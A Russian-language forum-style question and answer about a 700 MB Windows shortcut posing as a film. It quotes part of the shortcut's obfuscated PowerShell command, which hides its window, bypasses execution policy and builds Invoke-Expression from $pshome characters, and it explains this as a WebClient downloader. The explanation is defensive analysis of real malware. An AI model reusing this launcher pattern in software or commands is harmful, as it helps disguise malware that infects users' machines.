В Windows 10 я скачал этот файл, который, как мне показалось, был фильмом, но это был ярлык размером 700 МБ.
Я вижу, что цель это
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoPr -WINd 1 -eXEc ByP. ($ pshOmE [4]+$ PShoMe [30]+'X') (-JoiN ((44, 141, 163, 160, 170, 40, 75, 40, 50,50, 116, 145, 167,55, 117, 142, 152,145, 143, 164,40,123, 171,163,164, 145,155,56, 116
И это должно было начаться в
% SYSTEMROOT%\System32\WindowsPowerShell\v1.0
Что оно делает?
Это загрузчик вредоносных программ.
Он выполняет код powershell, начинающийся с New-Object System.N... (скрыто в цифрах), что в полном объеме является New-Object System.Net.WebClient , который в дальнейшем будет использоваться для загрузки и запуска реального вредоносного ПО с URL-адреса, который также скрыт в других номерах запутанного кода.
Если вы уже нажали на ссылку, то, скорее всего, вы уже заражены, если только URL не был удален.
Вы можете попытаться вставить свою строку в блокнот, а затем удалить все до ( -JoiN( ( , скопировать оставшуюся часть (начиная с ( -JoiN( ( ...)) и вставить ее в окно PowerShell. Он раскроет запутанный код PowerShell, который обычно выполняется предыдущим $pshOmE[4]+$PShoMe[30]+'X') = iex = Invoke-Expression .
